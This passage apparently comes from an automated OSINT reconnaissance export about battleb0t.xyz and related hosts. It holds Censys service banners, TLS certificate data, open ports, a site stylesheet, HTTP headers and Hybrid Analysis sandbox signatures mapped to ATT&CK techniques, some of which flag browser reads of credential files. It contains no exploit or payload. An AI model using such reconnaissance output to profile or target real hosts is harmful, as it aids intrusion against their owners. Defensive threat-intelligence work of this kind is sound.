{"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://165.232.113.85/"}, "response": {"body": "<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.18.0 (Ubuntu)</center>\r\n</body>\r\n</html>\r\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "404 Not Found", "protocol": "HTTP/1.1", "body_size": 162, "body_hashes": ["sha256:340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87", "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f"], "status_code": 404, "body_hash": "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f", "headers": {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Server": ["nginx/1.18.0 (Ubuntu)"]}, "html_tags": ["<title>404 Not Found</title>"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:47993c12bd45511268c274adb000951fc2436ea5a8e968b2b1f7b49fb5b05631"], "source_ip": "167.94.146.57", "extended_service_name": "HTTP", "observed_at": "2023-05-11T09:00:02.235713315Z", "banner_hex": "485454502f312e3120343034204e6f7420466f756e640d0a5365727665723a206e67696e782f312e31382e3020285562756e7475290d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_TELIA", "banner": "HTTP/1.1 404 Not Found\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "version": "1.18.0", "source": "OSI_APPLICATION_LAYER", "other": {"family": "nginx"}, "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:1.18.0:*:*:*:*:*:*:*", "part": "a"}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd", "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"], "chain": [{"issuer_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "subject_dn": "C=US, O=Let's Encrypt, CN=R3", "fingerprint": "67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd"}, {"issuer_dn": "O=Digital Signature Trust Co., CN=DST Root CA X3", "subject_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "fingerprint": "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"}], "leaf_data": {"pubkey_algorithm": "ECDSA", "public_key": {"key_algorithm": "ECDSA", "ecdsa": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "nHw/fXpTPJPh7RXQY/HEObaMVLT3ke0kPIUIN0WUC1w=", "x": "mCLSeRXmhneu3ZkCqqpIEcT5t89qEuMj/T3Pv+htI2M=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}, "fingerprint": "30f014a772b2784f28cc0c8eda057a195b3550629cbebeeea563bf4fba71e48c"}, "subject_dn": "CN=donation.ecash-pay.com", "pubkey_bit_size": 256, "fingerprint": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16", "issuer_dn": "C=US, O=Let's Encrypt, CN=R3", "names": ["donation.ecash-pay.com", "www.donation.ecash-pay.com"], "tbs_fingerprint": "7067e77960f4c789c8e143e4facda20855c120250ec8bfd5b30f06f36bf85662", "subject": {"common_name": ["donation.ecash-pay.com"]}, "signature": {"self_signed": false, "signature_algorithm": "SHA256-RSA"}, "issuer": {"common_name": ["R3"], "organization": ["Let's Encrypt"], "country": ["US"]}}, "leaf_fp_sha_256": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16"}, "cipher_selected": "TLS_CHACHA20_POLY1305_SHA256", "ja3s": "475c9302dc42b2751db9edcac3b74891", "_encoding": {"ja3s": "DISPLAY_HEX"}}, "_encoding": {"banner": "DISPLAY_UTF8", "banne | 165.232.113.85 |
| 2023-05-12 02:54:13 | Web Content | No | Web Spider | 0 | 0 | 3 | 0 | None | /* CSS Mini Reset */
html, body, div, form, fieldset, legend, label { margin: 0; padding: 0; }
table { border-collapse: collapse; border-spacing: 0; }
th, td { text-align: left; vertical-align: top; }
h1, h2, h3, h4, h5, h6, th, td, caption { font-weight:normal; }
img { border: 0; }
/* Fonts */
@font-face {
font-family: 'Avenir Next';
src: local('AvenirNext-Bold'), url('./fonts/AvenirNext-Bold.woff2');
font-weight: 700;
font-style: normal;
}
@font-face {
font-family: 'Avenir Next';
src: local('AvenirNext-BoldItalic'), url('./fonts/AvenirNext-BoldItalic.woff2');
font-weight: 700;
font-style: italic;
}
@font-face {
font-family: 'Avenir Next';
src: local('AvenirNext-DemiBold'), url('./fonts/AvenirNext-DemiBold.woff2');
font-weight: 600;
font-style: normal;
}
@font-face {
font-family: 'Avenir Next';
src: local('AvenirNext-DemiBoldItalic'), url('./fonts/AvenirNext-DemiBoldItalic.woff2');
font-weight: 600;
font-style: italic;
}
@font-face {
font-family: 'Avenir Next';
src: local('AvenirNext-Heavy'), url('./fonts/AvenirNext-Heavy.woff2');
font-weight: 900;
font-style: normal;
}
@font-face {
font-family: 'Avenir Next';
src: local('AvenirNext-HeavyItalic'), url('./fonts/AvenirNext-HeavyItalic.woff2');
font-weight: 900;
font-style: italic;
}
@font-face {
font-family: 'Avenir Next';
src: local('AvenirNext-Italic'), url('./fonts/AvenirNext-Italic.woff2');
font-weight: 400;
font-style: italic;
}
@font-face {
font-family: 'Avenir Next';
src: local('AvenirNext-Medium'), url('./fonts/AvenirNext-Medium.woff2');
font-weight: 500;
font-style: normal;
}
@font-face {
font-family: 'Avenir Next';
src: local('AvenirNext-MediumItalic'), url('./fonts/AvenirNext-MediumItalic.woff2');
font-weight: 500;
font-style: italic;
}
@font-face {
font-family: 'Avenir Next';
src: local('AvenirNext-Regular'), url('./fonts/AvenirNext-Regular.woff2');
font-weight: 400;
font-style: normal;
}
@font-face {
font-family: 'Avenir Next';
src: local('AvenirNext-UltraLight'), url('./fonts/AvenirNext-UltraLight.woff2');
font-weight: 200;
font-style: normal;
}
@font-face {
font-family: 'Avenir Next';
src: local('AvenirNext-UltraLightItalic'), url('./fonts/AvenirNext-UltraLightItalic.woff2');
font-weight: 200;
font-style: italic;
}
/* Site Styles */
:root {
--c-primary: rgb(209, 197, 173);
--c-secondary: rgba(200,200,200,.85);
--c-tertiary: hsl(88, 25%, 11%, .5);
--v-space: 6rem;
--canvas-height: 80vh;
--f-weight: 600;
--border-radius: min(10vw, var(--v-space));
}
html {
font-size: 16px;
line-height: 1.5;
background: rgb(15, 15, 16);
/* font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", sans-serif; */
font-family: "Avenir Next", Avenir, "Helvetica Neue", sans-serif;
color: var(--c-secondary);
box-sizing: border-box;
}
.canvas-container {
position: fixed;
top: 0;
right: 0;
left: 0;
height: 100vh;
z-index: 1;
pointer-events: none;
}
a {
color: var(--c-primary);
/* text-decoration: none; */
font-weight: var(--f-weight);
}
a:hover {
text-decoration: none;
}
main {
/* visibility: hidden; */
display: grid;
grid-template-columns: 1fr 6fr 4fr 1fr;
grid-template-rows: 1fr 3fr auto;
grid-template-areas:
". header header ."
". intro . ."
". timeline timeline ."
"footer footer footer footer";
}
.logo {
margin: var(--v-space) 0 0 0;
opacity: 0;
will-change: opacity;
grid-area: header;
align-self: end;
}
.no-js .logo { opacity: 1; }
.loaded .logo {
animation-name: fadeIn;
animation-duration: 2s;
animation-delay: .25s;
animation-timing-function: ease-out;
animation-fill-mode: forwards;
}
.logo a {
font-size: 6.5rem;
font-weight: 700;
line-height: 0.8;
text-decoration: none;
}
.type-primary {
font-weight: var(--f-weight);
font-size: 3rem;
line-height: 1.4;
}
.intro {
/* z-index: 2; */
opacity: 0;
will-change: opacity;
margin: var(--v-space) 0;
grid-area: intro;
align-self: end;
}
.no-js .intro { opacity: 1; }
.loaded .intro {
animation-name: fadeIn;
animation-duration: 2.2s;
animation-delay: .5s;
animation-timing-function: ease-out;
animation-fill-mode: forwards;
}
.timeline {
grid-area: timeline;
}
.timeline-entry {
z-index: 2;
background: var(--c-tertiary);
backdrop-filter: saturate(180%) blur(40px);
-webkit-backdrop-filter: saturate(180%) blur(40px);
position: relative;
padding: calc(var(--v-space)/2) 0;
display: grid;
grid-template-columns: 1fr 5fr 5fr 1fr;
grid-template-rows: auto;
grid-template-areas:
". co description .";
}
.timeline-entry:first-child {
border-top-left-radius: var(--border-radius);
border-top-right-radius: var(--border-radius);
}
.timeline-entry:last-child {
border-bottom-left-radius: var(--border-radius);
border-bottom-right-radius: var(--border-radius);
}
.timeline-co {
margin: calc(var(--v-space) * .5) 0 0;
grid-area: co;
}
.timeline-co a {
color: var(--c-primary);
}
.timeline-time {
display: block;
}
.timeline-description {
margin: calc(var(--v-space) * .5) 0 0;
font-weight: normal;
font-size: 1.5rem;
line-height: 1.4;
grid-area: description;
}
footer {
grid-area: footer;
display: grid;
grid-template-columns: 1fr 5fr 5fr 1fr;
grid-template-rows: auto;
grid-template-areas:
". p p ."
}
footer .footer-content {
z-index: 1;
padding: var(--v-space) 0;
font-weight: var(--f-weight);
font-size: 1.5rem;
line-height: 1.4;
grid-area: p;
}
@media only screen and (max-width: 834px) {
:root {
--v-space: 4rem;
}
html {
font-size: 14px;
}
main {
grid-template-columns: 1fr 8fr 2fr 1fr;
}
}
@media only screen and (max-width: 736px) {
:root {
--v-space: 3rem;
}
html {
font-size: 12px;
}
main {
grid-template-columns: 1fr 10fr 0fr 1fr;
}
.timeline-entry {
grid-template-columns: 1fr 5fr 5fr 1fr;
grid-template-rows: 1fr auto;
grid-template-areas:
". hr hr ."
". co co ."
". description description .";
}
}
@keyframes fadeIn {
0% { opacity: 0; }
100% { opacity: 1; }
} | https://battleb0t.xyz/./src/style.css?4 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-cache-status: REVALIDATED | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "REVALIDATED", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"79120efbf2a0b92da044ff91335c99c1\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=vgB2xlauGELdj%2BVZddouVM4SLWiyGeZvDcjgyrNUJ4TCe9uwaasjv9pVNp9guo70Mwha6%2BIFTjO1Dq74W7EW2JKyrFRh0Oar6OFkdlmTZx5KugtXbII33uvqzZHNgPLMNucdvqQl\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f605ceb464381-EWR"} |
| 2023-05-12 02:47:46 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 34.74.170.74:443 | 34.74.170.74 |
| 2023-05-12 02:44:24 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Open Graph | oldfluid.battleb0t.xyz |
| 2023-05-12 03:01:38 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.154): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:23:40 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.15:80 | 188.114.96.0/24 |
| 2023-05-12 02:59:57 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | support@bigmarker.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 23, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://www.bigmarker.com/taxadmin/The-Inbound-Customer-Experience?bmid=5673cc9137db&bmid_type=member', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\SM0:1480:304:WilStaging_02"\n "SM0:1480:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:1480:120:WilError_01"\n "Local\\SM0:1480:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"3.235.65.215:443"\n "138.91.254.96:443"\n "13.227.21.136:443"\n "13.227.21.58:443"\n "13.227.74.64:443"\n "185.199.108.153:443"\n "74.125.137.157:443"\n "142.250.191.68:443"\n "151.101.2.137:443"\n "162.247.243.29:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "bam.nr-data.net"\n "checkout.stripe.com"\n "d1f74no97k6yi9.cloudfront.net"\n "d5ln38p3754yc.cloudfront.net"\n "js-agent.newrelic.com"\n "stats.g.doubleclick.net"\n "webrtc.github.io"\n "www.bigmarker.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string "<meta name="twitter:card" content="summary_large_image">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")\n Found string "<meta name="twitter:site" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")\n Found string "<meta name="twitter:creator" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")\n Found string "<meta name="twitter:title" content="The Inbound Customer Experience">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")\n Found string "<meta name="twitter:description" content="Our panelists will discuss a variety of questions including:" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member"), Found string "<meta name="twitter:image" content="https://d5ln38p3754yc.cloudfront.net/conference_icons/7821611/large/1677693079-c5b46aaa6c8ef248.jpg?1677693079">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\index"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_0"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_1"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_2"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_3"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\history"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\autofill\\3.0.0.3\\edge_autofill_global_block_list.json"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\login data"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\site characteristics database\\log"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\edgecoupons\\coupons_data.db\\log"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\sync data\\leveldb\\log"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\7c516a82-27f5-4723-be57-30a8336c14b5.tmp"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\service worker\\database\\log"'}, {u'category': u'Installation/Persistence', u'origin': u'File/Memory', u'identifier': u'string-396', u'name': u'Contains ability to create/modify Windows services (Powershell command string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1543/003', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1543.003', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Found string "<div class="registrants-add-contents" style="padding-bottom: 28px">" (Indicator: "Add-Content"; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6236_1468670677\\shopping.js]- [targetUID: 00000000-00006236]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00001308]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\scoped_dir6236_1265273683\\Ruleset Data]- [targetUID: 00000000-0000623 |
| 2023-05-12 02:48:12 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 23, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://angular-ui.github.io/ui-router/release/angular-ui-router.min.js', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"SM0:6920:304:WilStaging_02"\n "SM0:6920:120:WilError_01"\n "InternetShortcutMutex"\n "Local\\SM0:6920:304:WilStaging_02"\n "Local\\SM0:6920:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"angular-ui.github.io"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: 